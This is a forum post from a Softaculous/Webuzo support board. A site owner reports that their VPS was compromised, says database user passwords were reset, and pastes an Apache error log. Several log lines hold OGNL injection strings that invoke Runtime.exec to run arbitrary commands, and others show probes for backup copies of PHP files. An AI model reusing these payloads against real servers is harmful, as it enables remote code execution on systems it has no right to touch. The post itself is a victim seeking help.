Softaculous

Topic : hack or bug?


Posted By: syntecom on September 10, 2018, 10:33 pm
Hi, I'm new on Webuzo control panel administration... I have my site on VPS Digital Ocean...

Since yesterday I figured out that all my password user access (MySQL DB) has changed to the numer "1" hashed in MD5. So, all my users lose his access..

something has hacked my control panel, something is trying to execute .vb extension on every php page of my site...

My password control panel (webuzzo) is the same (pretty complicate) so I think they access exploting some "BUG" on
third-party tools. Some idea??

I'm attaching the complete error log to this topic.

Thanks in advance... excuse my english please.

Error LOG example---------------------------------------------------

[Sun Sep 09 11:27:24.315808 2018] [core:error] [pid 27063] (36)File name too long: [client 190.112.100.129:56843] AH00036: access to /scripts/(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#wr=#context[#parameters.obj[0]].getWriter(),#rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()),#wr.println(#rs),#wr.flush(),#wr.close()):xx.toString.json failed (filesystem path '/home/cpcelr/public_html/scripts/(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#wr=#context[#parameters.obj[0]].getWriter(),#rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()),#wr.println(#rs),#wr.flush(),#wr.close()):xx.toString.json')
[Sun Sep 09 11:27:23.829682 2018] [core:error] [pid 28402] (36)File name too long: [client 190.112.100.129:56839] AH00036: access to /scripts/(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#wr=#context[#parameters.obj[0]].getWriter(),#rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()),#wr.println(#rs),#wr.flush(),#wr.close()):xx.toString.json failed (filesystem path '/home/cpcelr/public_html/scripts/(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#wr=#context[#parameters.obj[0]].getWriter(),#rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()),#wr.println(#rs),#wr.flush(),#wr.close()):xx.toString.json')
[Sun Sep 09 11:26:46.367792 2018] [core:error] [pid 27477] (36)File name too long: [client 190.112.100.129:56718] AH00036: access to /3dParty/colorbox/(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?

[Sun Sep 09 11:21:56.262909 2018] [:error] [pid 26189] [client 190.112.100.129:55063] PHP Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, string given in /home/cpcelr/public_html/noticia.php on line 7
[Sun Sep 09 11:21:55.269229 2018] [:error] [pid 2751] [client 190.112.100.129:55056] script '/home/cpcelr/public_html/tecnica-maletin.php.vb' not found or unable to stat
[Sun Sep 09 11:21:54.711651 2018] [:error] [pid 26189] [client 190.112.100.129:55054] script '/home/cpcelr/public_html/tecnica-maletin.php.cs' not found or unable to stat
[Sun Sep 09 11:21:54.142623 2018] [:error] [pid 27063] [client 190.112.100.129:55052] script '/home/cpcelr/public_html/Copy of tecnica-maletin.php' not found or unable to stat
[Sun Sep 09 11:21:52.437285 2018] [:error] [pid 16393] [client 190.112.100.129:55044] script '/home/cpcelr/public_html/tecnica-maletin.php.bak' not found or unable to stat
[Sun Sep 09 11:21:40.274565 2018] [:error] [pid 26188] [client 190.112.100.129:55008] script '/home/cpcelr/public_html/servicios-reglamento.php.vb' not found or unable to stat
[Sun Sep 09 11:21:39.713788 2018] [:error] [pid 27063] [client 190.112.100.129:55006] script '/home/cpcelr/public_html/servicios-reglamento.php.cs' not found or unable to stat
[Sun Sep 09 11:21:39.155558 2018] [:error] [pid 26190] [client 190.112.100.129:55001] script '/home/cpcelr/public_html/Copy of servicios-reglamento.php' not found or unable to stat
[Sun Sep 09 11:21:37.442874 2018] [:error] [pid 27063] [client 190.112.100.129:54996] script '/home/cpcelr/public_html/servicios-reglamento.php.bak' not found or unable to stat
[Sun Sep 09 11:21:08.379206 2018] [:error] [pid 16393] [client 190.112.100.129:54865] PHP Warning: array_values() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
[Sun Sep 09 11:21:08.379177 2018] [:error] [pid 16393] [client 190.112.100.129:54865] PHP Warning: array_keys() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
[Sun Sep 09 11:21:07.811457 2018] [:error] [pid 27078] [client 190.112.100.129:54862] PHP Warning: array_values() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
[Sun Sep 09 11:21:07.811418 2018] [:error] [pid 27078] [client 190.112.100.129:54862] PHP Warning: array_keys() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
[Sun Sep 09 11:21:06.613840 2018] [:error] [pid 26190] [client 190.112.100.129:54856] PHP Warning: array_values() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
[Sun Sep 09 11:21:06.613797 2018] [:error] [pid 26190] [client 190.112.100.129:54856] PHP Warning: array_keys() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
[Sun Sep 09 11:21:05.505184 2018] [:error] [pid 27078] [client 190.112.100.129:54852] script '/home/cpcelr/public_html/servicios-fondo.php.vb' not found or unable to stat
[Sun Sep 09 11:21:04.934223 2018] [:error] [pid 26189] [client 190.112.100.129:54849] script '/home/cpcelr/public_html/servicios-fondo.php.cs' not found or unable to stat
[Sun Sep 09 11:21:04.664179 2018] [:error] [pid 26188] [client 190.112.100.129:54848] PHP Warning: array_values() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30

Powered By AEF 1.0.8 © 2007-2008 Electron Inc.